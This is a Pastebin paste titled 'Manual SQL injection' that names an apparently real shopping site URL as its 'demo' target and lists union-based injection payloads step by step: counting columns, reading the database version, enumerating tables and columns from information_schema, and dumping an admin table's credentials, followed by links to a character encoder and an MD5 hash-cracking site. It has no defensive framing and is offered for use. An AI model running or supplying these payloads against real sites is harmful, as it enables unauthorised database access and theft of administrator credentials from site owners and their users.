Advertisement
lollhosh

Manual SQL injection

May 9th, 2017
149
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.82 KB | None | 0 0
  1. ######################
  2. # Demo :
  3. ========
  4. http://vikimobile.com/top-brands?bid=5
  5. ############
  6. # commands :
  7. ###########
  8. order by 100 -- -
  9. ============
  10. union select 1,2,3+--+
  11. =============
  12. version()
  13. ============================================
  14. group_concat(table_name)
  15. ------
  16. +from+information_schema.tables+where+table_schema=database()+--+
  17. ============================================
  18. http://www.waraxe.us/sql-char-encoder.html
  19. =================================================
  20. group_concat(column_name)
  21. +from+information_schema.columns+where+table_name=*****+--+
  22. ===============================================
  23. group_concat(***,0x3a,***)
  24. +from+admin+--+
  25. ===================================
  26. #####################################
  27. https://hashkiller.co.uk/md5-decrypter.aspx
  28. #####################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement